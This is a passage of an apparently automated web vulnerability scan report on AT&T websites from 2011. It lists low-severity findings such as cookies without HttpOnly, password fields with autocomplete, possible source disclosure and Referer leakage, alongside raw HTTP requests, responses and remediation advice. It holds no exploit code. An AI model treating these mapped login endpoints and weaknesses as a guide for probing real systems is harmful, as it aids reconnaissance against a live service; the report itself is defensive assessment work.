The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /u-verse/shop/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.att.com">here</a>.</p> </body></html ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
colam_ctn=l%3Den_US; Domain=att.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /eos/unauth/eosLogin HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/enterEmailForgotId.myworld HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/loginAction.doview HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/accessories/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phone-plans/data-connect-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phone-plans/family-cell-phone-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phone-plans/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phone-plans/individual-cell-phone-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phone-plans/pyg-cell-phone-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phones/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phones/cell-phones.jsp?wtSlotClick=1-005Y6F-0-1&feacondition=allphones&feaavailable=allphones&feafree=free&feapaytype=standard&startFilter=false&allTypes=on&allManus=on HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phones/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phones/pda-phones-smartphones.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/go-phones/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/packages/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/ringtones_media/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/services/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/specials/netbooks.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/transfer-your-number/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /coverageviewer/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.att.com/stor ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /learn/international/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Expires: Tue, 06 Sep 2011 11:06:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 11:06:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=3FD1F714D87810D8547984A4C33E7EED; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:06:20 GMT; path=/ Content-Length: 61536
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"> <head> <title>International calling rates and packages - ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /learn/ringtones-downloads/myatt-mobile.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Expires: Tue, 06 Sep 2011 11:06:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 11:06:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=3FF116BCD87810D85528BCD4C2B001A1; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:06:20 GMT; path=/ Content-Length: 54761
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"> <head> <title>Account Management App - myAT&T Mobile - W ...[SNIP]...
8. Password field with autocomplete enabledpreviousnext There are 11 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The page contains a form with the following action URL:
https://www.att.com/olam/loginAction.olamexecute
The form contains the following password field with autocomplete enabled:
pass
Request
GET /homepage/index.jsp?locale=es_US HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://www.att.com/olam/loginAction.doview
The form contains the following password field with autocomplete enabled:
pass
Request
GET /homepage/index.jsp?locale=es_US HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://www.att.com/olam/loginAction.doview
The form contains the following password field with autocomplete enabled:
pass
Request
GET /homepage/index.jsp?locale=es_US HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
password
Request
GET /eos/unauth/eosLogin?wtSlotClick=1-006E1J-0-1&productType=uverse HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
password
Request
GET /olam/loginAction.doview HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
password
Request
GET /olam/loginAction.olamexecute HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
password
Request
GET /olam/passthroughAction.myworld HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The application appears to disclose some server-side source code written in PHP.
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /accounts/?source=IC4425j4900s2000 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Pragma: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 11:07:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=6B082CE6D87810D8CD99D3E8A5FA1414; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:07:32 GMT; path=/ Content-Length: 45366
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>Manage Your AT&T Accounts - View & ...[SNIP]... <noscript> <iframe src="http://view.atdmt.com/iaction/WiredOLAM" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe> ...[SNIP]... <li><a href="http://mail.yahoo.com/?.intl=us&partner=sbc" name="MyATT_att.net_Email" >Email</a> ...[SNIP]... <br> <a href="http://att.promo.eprize.com/free/rules.html" target="_blank" title="">Official Rules</p> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
GET /esupport/article.jsp?wtSlotClick=1-006E1O-0-4&sid=KB410273 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /esupport/billAndAccount.jsp?cv\u003d820 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /esupport/billingAndAccount.jsp?wtSlotClick=1-0063FF-0-1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /esupport/index.jsp?wtSlotClick=1-006E1M-0-5 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /esupport/main.jsp?cv\u003d813 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /esupport/travelAndIntl.jsp?wtSlotClick=1-006E1O-0-2&cv=820 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /esupport/welcome.jsp?cv\u003d814 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
...[SNIP]... <li><a href="http://yellowpages.com/" name="Support_Additional Services_Yellow Pages" >Yellow Pages</a> ...[SNIP]... <li> <a href="http://att.software.yahoo.com/?wtSlotClick=1-002J76!900715-0-1" onclick="">AT&T Internet Security Suite Powered by McAfee®</a> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /gen/general?wtSlotClick=1-00679Z-0-5&pid=18121 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 06 Sep 2011 11:07:20 GMT Content-Length: 24007 Connection: close Set-Cookie: JSID_coredisp=0000wB98saWwDGV2C8KXT0jvvaa:14cq1ik0g; Path=/
<!-- --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- BEGIN : Global Main part for ...[SNIP]... <noscript> <iframe src="http://switch.atdmt.com/iaction/aveamm_07shop_internet" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe> ...[SNIP]... <!-- end of AO tag -->
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a> <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a> <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a> <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a> <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /gen/landing-pages?pid=9213 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 06 Sep 2011 11:07:29 GMT Content-Length: 28750 Connection: close Set-Cookie: DTAB=Tab=Bus; Expires=Mon, 05 Dec 2011 11:07:28 GMT; Path=/; Domain=.att.com
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <he ...[SNIP]... <map name="rotateNext1Map" id="rotateNext1Map" class="rotateHero"> <area alt="Learn more" title="Learn more" coords="529,162,609,178" href="http://clk.atdmt.com/CNT/go/324891318/direct/01/" onClick="dcsMultiTrack('DCS.dcsuri','/virtual/offsite','DCS.dcsref','http://www.att.com/gen/landing-pages?pid=9213','DCSext.wtLinkName','SMB_Cold_Banner2','DCSext.wtLinkLoc','BDY','DCSext.wtEvent','Offsite_Link_Click','DCSext.wtNoHit','1');"/>
